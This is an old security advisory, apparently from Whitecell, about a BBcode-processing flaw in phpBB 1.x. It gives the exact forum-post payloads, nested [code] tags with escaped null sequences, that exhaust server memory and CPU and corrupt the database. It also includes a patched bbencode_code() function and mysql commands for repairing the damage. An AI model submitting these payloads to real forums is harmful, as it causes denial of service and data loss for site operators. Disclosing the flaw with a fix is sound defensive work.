COMMAND

	phpBB DoS and database destruction

SYSTEMS AFFECTED

	 phpBB Group phpBB 1.4.4

	 phpBB Group phpBB 1.4.2

	 phpBB Group phpBB 1.4.1

	 phpBB Group phpBB 1.4.0

	 phpBB Group phpBB 1.2.1

	 phpBB Group phpBB 1.2.0

	 phpBB Group phpBB 1.0.0

	

	Not tested :
	 phpBB Group phpBB 2.x

	

PROBLEM

	In   Whitecell   Security    Systems    advisory    WSS-Advisories-02003
	[http://www.whitecell.org] :
	

	WSS has found a vulnerability in PHPBB when PHPBB  process  BBcode,which
	could enbale one user D.O.S system and destroy PHPBB databases.
	

	 Description

	 ===========

	

	phpbb               support                nesting                BBcode
	[code][/code],[quote][/quote],[list][/list].  Unfortunately,there  is  a
	mistake when process BBcode in functions.php
	

	

	 Exploit

	 =======

	

	submit the following poster:
	

	

	[code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code]

	

	

	In fact,  the  following  data  have  saved  to  database  after  BBcode
	process:
	

	

	[1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1][1code]

	\\0\\0\\0\\0\\0\\0\\0

	[/code1]

	

	

	submit the following poster:
	

	[code]\'\\0\'*800[/code]

	

	

	see system
	

	whitecell$ top

	PID  USER      PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND

	8643 nobody    13   0   212M  81M 13604 D     8.0 65.7   0:07 httpd

	

	

	phpbb error message:
	

	Could not enter post text! 

	

	

	but in fact, two data have alreay saved to databases. Now, the  database
	is uncompleted. If you brower the forum to see  which  you  post,  phpbb
	could report message: \"Could not connect to the forums database.\"
	

	submit 49 bytes data:
	

	

	[code]\\0[code]\\0[code]\\0[/code]\\0[/code]\\0[/code]

	

	

	type top to see cpu:
	

	  PID USER     PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND

	25741 nobody    14   0 11828 9996   416 R    99.9  7.8   2:38 httpd

	

	

	Experiment environment
	

	linux 2.4.10   Apache/1.3.23   PHP 4.1.2 

	

SOLUTION

	 Workaround

	 ==========

	

	 1:disale BBcode until Vendor fixed.

	 2:modify functions.php bbencode_code()

	

	

	function bbencode_code($message, $is_html_disabled)

	{

		$message = preg_replace(\"/\\[code\\](.*?)\\[\\/code\\]/si\", \"<!-- BBCode Start --><TABLE BORDER=0

	ALIGN=CENTER WIDTH=85><TR><TD>Code:<HR></TD></TR><TR><TD><PRE>\\\\1</PRE></TD></TR><TR><TD><HR></TD></TR></TABLE><!--

	BBCode End -->\", $message);
		return $message;

	

	} // bbencode_code()
	

	

	

	 Database repair

	 ===============

	

	if url is  http://host/forums/viewtopic.php?topic=1162&forum=1&0
	you can use the following command to repair it :
	

	

	whitecell$ mysql -uuser -ppasswd

	mysql> use databasename;

	mysql> select *  from topics where topic_id = 1162; //GET post_id

	mysql> delete from posts where post_id = 6280;

	mysql> delete from posts_text where post_id = 6280;

	mysql> delete  from topics where topic_id = 1162;